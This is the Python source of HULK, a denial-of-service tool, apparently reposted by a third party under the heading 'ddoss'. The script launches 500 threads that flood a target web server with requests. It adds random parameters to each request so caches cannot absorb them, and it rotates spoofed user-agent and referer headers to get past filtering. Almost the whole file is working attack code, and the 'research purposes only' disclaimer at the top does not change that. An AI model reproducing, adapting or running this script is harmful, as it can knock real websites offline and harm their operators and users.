ddoss

1. # Infi-Zeal Technologies
2. # Regards,
3. # Hardeep Singh
4.  
5. # ----------------------------------------------------------------------------------------------
6. # HULK - HTTP Unbearable Load King
7. #
8. # this tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them
9. # to their knees by exhausting the resource pool, its is meant for research purposes only
10. # and any malicious usage of this tool is prohibited.
11. #
12. # author : Barry Shteiman , version 1.0
13. # ----------------------------------------------------------------------------------------------
14. import urllib2
15. import sys
16. import threading
17. import random
18. import re
19.  
20. #global params
21. url=''
22. host=''
23. headers_useragents=[]
24. headers_referers=[]
25. request_counter=0
26. flag=0
27. safe=0
28.  
29. def inc_counter():
30. global request_counter
31. request_counter+=1
32.  
33. def set_flag(val):
34. global flag
35. flag=val
36.  
37. def set_safe():
38. global safe
39. safe=1
40.  
41. # generates a user agent array
42. def useragent_list():
43. global headers_useragents
44. headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
45. headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
46. headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
47. headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
48. headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
49. headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
50. headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
51. headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
52. headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
53. headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
54. headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
55. headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
56. return(headers_useragents)
57.  
58. # generates a referer array
59. def referer_list():
60. global headers_referers
61. headers_referers.append('http://www.google.com/?q=')
62. headers_referers.append('http://yandex.ru/yandsearch?text=%D1%%D2%?=g.sql()81%..')
63. headers_referers.append('http://vk.com/profile.php?redirect=')
64. headers_referers.append('http://www.usatoday.com/search/results?q=')
65. headers_referers.append('http://engadget.search.aol.com/search?q=query?=query=..')
66. headers_referers.append('https://www.google.ru/#hl=ru&newwindow=1?&saf..,or.r_gc.r_pw=?.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=882')
67. headers_referers.append('https://www.google.ru/#hl=ru&newwindow=1&safe..,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=925')
68. headers_referers.append('http://yandex.ru/yandsearch?text=')
69. headers_referers.append('https://www.google.ru/#hl=ru&newwindow=1&safe..,iny+gay+q=pcsny+=;zdr+query?=poxy+pony&gs_l=hp.3.r?=.0i19.505.10687.0.10963.33.29.4.0.0.0.242.4512.0j26j3.29.0.clfh..0.0.dLyKYyh2BUc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp?=?fd2cf4e896a87c19&biw=1389&bih=832')
70. headers_referers.append('http://go.mail.ru/search?mail.ru=1&q=')
71. headers_referers.append('http://nova.rambler.ru/search?=btnG?=%D0?2?%D0?2?%=D0..')
72. headers_referers.append('http://ru.wikipedia.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..')
73. headers_referers.append('http://ru.search.yahoo.com/search;_yzt=?=A7x9Q.bs67zf..')
74. headers_referers.append('http://ru.search.yahoo.com/search;?_query?=l%t=?=?A7x..')
75. headers_referers.append('http://go.mail.ru/search?gay.ru.query=1&q=?abc.r..')
76. headers_referers.append('http://nova.rambler.ru/search?btnG=%D0%9D%?D0%B0%D0%B..')
77. headers_referers.append('http://www.google.ru/url?sa=t&rct=?j&q=&e..')
78. headers_referers.append('http://help.baidu.com/searchResult?keywords=')
79. headers_referers.append('http://www.bing.com/search?q=')
80. headers_referers.append('https://www.yandex.com/yandsearch?text=')
81. headers_referers.append('https://duckduckgo.com/?q=')
82. headers_referers.append('http://www.ask.com/web?q=')
83. headers_referers.append('http://search.aol.com/aol/search?q=')
84. headers_referers.append('https://www.om.nl/vaste-onderdelen/zoeken/?zoeken_term=')
85. headers_referers.append('https://www.facebook.com/search/results/?init=quick&q=')
86. headers_referers.append('http://blekko.com/#ws/?q=')
87. headers_referers.append('http://www.infomine.com/search/?q=')
88. headers_referers.append('https://twitter.com/search?q=')
89. headers_referers.append('http://www.wolframalpha.com/input/?i=')
90. headers_referers.append('http://' + host + '/')
91. return(headers_referers)
92.  
93. #builds random ascii string
94. def buildblock(size):
95. out_str = ''
96. for i in range(0, size):
97. a = random.randint(65, 90)
98. out_str += chr(a)
99. return(out_str)
100.  
101. def usage():
102. print '---------------------------------------------------'
103. print 'USAGE: python hulk.py <url>'
104. print 'you can add "safe" after url, to autoshut after dos'
105. print '---------------------------------------------------'
106.  
107.  
108. #http request
109. def httpcall(url):
110. useragent_list()
111. referer_list()
112. code=0
113. if url.count("?")>0:
114. param_joiner="&"
115. else:
116. param_joiner="?"
117. request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
118. request.add_header('User-Agent', random.choice(headers_useragents))
119. request.add_header('Cache-Control', 'no-cache')
120. request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
121. request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
122. request.add_header('Keep-Alive', random.randint(110,120))
123. request.add_header('Connection', 'keep-alive')
124. request.add_header('Host',host)
125. try:
126. urllib2.urlopen(request)
127. except urllib2.HTTPError, e:
128. #print e.code
129. set_flag(1)
130. print 'Response Code 500'
131. code=500
132. except urllib2.URLError, e:
133. #print e.reason
134. sys.exit()
135. else:
136. inc_counter()
137. urllib2.urlopen(request)
138. return(code)
139.  
140.  
141. #http caller thread
142. class HTTPThread(threading.Thread):
143. def run(self):
144. try:
145. while flag<2:
146. code=httpcall(url)
147. if (code==500) & (safe==1):
148. set_flag(2)
149. except Exception, ex:
150. pass
151.  
152. # monitors http threads and counts requests
153. class MonitorThread(threading.Thread):
154. def run(self):
155. previous=request_counter
156. while flag==0:
157. if (previous+100<request_counter) & (previous<>request_counter):
158. print "%d Requests Sent" % (request_counter)
159. previous=request_counter
160. if flag==2:
161. print "\n-- HULK Attack Finished --"
162.  
163. #execute
164. if len(sys.argv) < 2:
165. usage()
166. sys.exit()
167. else:
168. if sys.argv[1]=="help":
169. usage()
170. sys.exit()
171. else:
172. print "-- HULK Attack Started --"
173. if len(sys.argv)== 3:
174. if sys.argv[2]=="safe":
175. set_safe()
176. url = sys.argv[1]
177. if url.count("/")==2:
178. url = url + "/"
179. m = re.search('http\://([^/]*)/?.*', url)
180. host = m.group(1)
181. for i in range(500):
182. t = HTTPThread()
183. t.start()
184. t = MonitorThread()
185. t.start()